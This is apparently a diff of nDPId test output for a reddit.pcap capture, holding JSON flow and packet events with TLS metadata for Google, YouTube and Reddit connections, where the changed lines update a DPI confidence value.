-00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 